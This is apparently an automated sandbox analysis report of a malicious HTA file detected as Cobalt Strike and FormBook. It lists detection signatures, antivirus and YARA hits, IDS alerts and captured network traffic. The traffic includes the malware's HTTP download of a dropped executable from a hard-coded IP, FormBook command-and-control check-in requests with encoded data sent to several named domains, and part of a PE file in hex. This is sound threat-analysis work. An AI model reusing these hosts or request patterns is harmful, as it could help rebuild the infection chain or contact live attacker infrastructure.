Windows Analysis Report
givemebestthingsforgivemebest.hta

Overview

General Information

Sample name: givemebestthingsforgivemebest.hta
Analysis ID: 1649248
MD5: 2d104c8499a3ab875902770edcbbc899
SHA1: 83b84d7837c1aa991f50fb81429064eca9f84af8
SHA256: 4330364ed7044671ea3d48f8ad3ac8bb079eac0a7d12d1e6ddfcb47927386835
Tags: htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Binary is likely a compiled AutoIt script file
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\smss.exe Avira: detection malicious, Label: TR/AD.Swotter.mzyvw
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\smss[1].exe Avira: detection malicious, Label: TR/AD.Swotter.mzyvw
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\smss[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\smss.exe ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: givemebestthingsforgivemebest.hta ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2697502538.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2699158883.0000000005780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800345962.0000000003A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1799971563.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2695985493.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2697439176.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800824318.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2697537339.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 98.3%
Source: Binary string: q8C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.pdb source: powershell.exe, 00000003.00000002.1565515176.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ATBroker.pdb source: svchost.exe, 00000007.00000003.1767938286.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1768041309.000000000342B000.00000004.00000020.00020000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2696806857.00000000009CE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: smss.exe, 00000006.00000003.1557592765.0000000004560000.00000004.00001000.00020000.00000000.sdmp, smss.exe, 00000006.00000003.1557262259.0000000004700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1800388098.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1702775205.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1800388098.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1700226963.0000000003700000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1803238497.0000000004D42000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.000000000508E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1800364851.0000000004B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: smss.exe, 00000006.00000003.1557592765.0000000004560000.00000004.00001000.00020000.00000000.sdmp, smss.exe, 00000006.00000003.1557262259.0000000004700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1800388098.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1702775205.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1800388098.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1700226963.0000000003700000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1803238497.0000000004D42000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.000000000508E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1800364851.0000000004B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000007.00000003.1767938286.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1768041309.000000000342B000.00000004.00000020.00020000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2696806857.00000000009CE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2695980394.000000000012F000.00000002.00000001.01000000.0000000A.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000002.2695984415.000000000012F000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00A8445A
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8C6D1 FindFirstFileW,FindClose, 6_2_00A8C6D1
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_00A8C75C
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00A8EF95
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00A8F0F2
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00A8F3F3
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00A837EF
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00A83B12
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00A8BCBC

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 172.245.123.32:80 -> 192.168.2.5:49716
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 172.245.123.32:80 -> 192.168.2.5:49716
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49725 -> 75.2.103.23:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 149.104.1.185:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 198.58.118.167:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49728 -> 149.104.1.185:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 198.58.118.167:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49736 -> 198.58.118.167:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49731 -> 149.104.1.185:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 45.119.52.125:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49744 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 45.119.52.125:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 45.119.52.125:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 149.104.1.185:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49748 -> 45.119.52.125:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 198.58.118.167:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 76.223.54.146:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.vczuahand.xyz
Source: DNS query: www.855696a.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Mar 2025 14:59:44 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 26 Mar 2025 04:42:06 GMTETag: "124400-63137759d9d4a"Accept-Ranges: bytesContent-Length: 1197056Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8c 85 e3 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 62 09 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 12 00 00 04 00 00 b6 8a 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 58 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 12 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 ba 05 00 00 70 0c 00 00 bc 05 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 30 12 00 00 72 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELg"b}@@@@L|pX0q+pH@.text
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 75.2.103.23 75.2.103.23
Source: Joe Sandbox View IP Address: 75.2.103.23 75.2.103.23
Source: Joe Sandbox View IP Address: 76.223.54.146 76.223.54.146
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_047E7A18 URLDownloadToFileW, 3_2_047E7A18
Source: global traffic HTTP traffic detected: GET /70/smss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.32Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d4kl/?DjqdfNk=6y/7tod/VF/KHUQqfM/wfVXibkdmZeeslXhDnWhvAY/z/yk3pdRRAQekYBjFWPUzPUKr4nIOcHvctiu99XDhEDhTzejKR0AKl6+T/G5w3q1KIwX/LqFItooehhCIycehmA==&fNeX=nNpDjLP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.thykingdomwear.storeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic HTTP traffic detected: GET /1imc/?DjqdfNk=GkZ+7lZN5ZbT6rZBuZ+pskfJL+6uT56R2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHhd+DXQfhkENwgiz5+jrub82ItCLB/EMlgTjPlwiCI2nY+w==&fNeX=nNpDjLP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.worrr37.yachtsUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic HTTP traffic detected: GET /ma0g/?DjqdfNk=H2S90RmziCMvLCuL5yTkJF203ndQbU/T+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqi+1gs/5BxCzY4CtYzWb39E9UovJPnlwKJarvBRzz8eyTcw==&fNeX=nNpDjLP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.soportemx-findmy.clickUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic HTTP traffic detected: GET /04r3/?DjqdfNk=n6ptdLvBCapBX+1eOVrY57v3fry5rNe0wfWRjljnFiAjsKOl5dK99Lywx+Nqo77d2RcdyHveJO2lBX31lOnFlf4SmZDL+ssCij03tKgdKaReZJPMIs0OS1RV9JnQRCS0ZQ==&fNeX=nNpDjLP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.blackhat.chatUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic HTTP traffic detected: GET /lvz4/?fNeX=nNpDjLP&DjqdfNk=Xs1PCb/MaYPIPAxDxxaHIqF2/A8U3qhMCQOIGo7Nl8rFa4QZz+K5GgFtLYl71/JRpNHUa5jW6jDEqn+5iMTLHdL1Y/QGyX5Eh3lnSRmxHsn6PYCafu4CItr73qQ+61rxpA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.vczuahand.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic HTTP traffic detected: GET /q86a/?DjqdfNk=1RS/DLESjC/mKKX9C/bcN2l/5Bt+ZmCCo7MGFq+OZJ2Pg2HsdXdlDjVOv2U28y6Xqr87siUnw8FG4MQCr+RpXrpLY0pe8E1oH/6FSjr22gQjBdPmae5AdSMbv8VH/OtMXA==&fNeX=nNpDjLP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.855696a.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic DNS traffic detected: DNS query: www.thykingdomwear.store
Source: global traffic DNS traffic detected: DNS query: www.worrr37.yachts
Source: global traffic DNS traffic detected: DNS query: www.soportemx-findmy.click
Source: global traffic DNS traffic detected: DNS query: www.blackhat.chat
Source: global traffic DNS traffic detected: DNS query: www.vczuahand.xyz
Source: global traffic DNS traffic detected: DNS query: www.855696a.xyz
Source: unknown HTTP traffic detected: POST /1imc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 208Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.worrr37.yachtsOrigin: http://www.worrr37.yachtsReferer: http://www.worrr37.yachts/1imc/User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516Data Raw: 44 6a 71 64 66 4e 6b 3d 4c 6d 78 65 34 54 34 4a 6f 62 69 43 32 4b 42 56 35 63 79 37 76 6e 44 6e 4f 70 79 32 51 4b 61 75 77 39 34 75 30 4b 44 77 36 31 49 58 67 6c 4b 4c 46 6f 76 6b 48 46 6d 36 66 71 4e 54 47 71 64 57 4c 51 4e 57 70 64 44 4a 33 71 4b 47 39 6e 73 54 74 30 77 53 6d 4d 6d 66 64 77 53 39 6c 46 64 77 33 53 32 61 67 77 72 71 62 4f 4c 41 74 68 66 6e 2b 32 59 69 32 68 36 2b 6a 57 37 57 4f 31 48 54 74 75 44 43 32 72 59 67 52 2b 4f 2b 6b 66 56 71 64 35 51 50 6f 59 78 75 6e 32 77 78 46 32 74 75 73 68 57 79 44 4c 39 6f 70 79 39 6e 31 31 48 65 41 63 71 46 30 71 39 2b 37 74 70 47 4e 4c 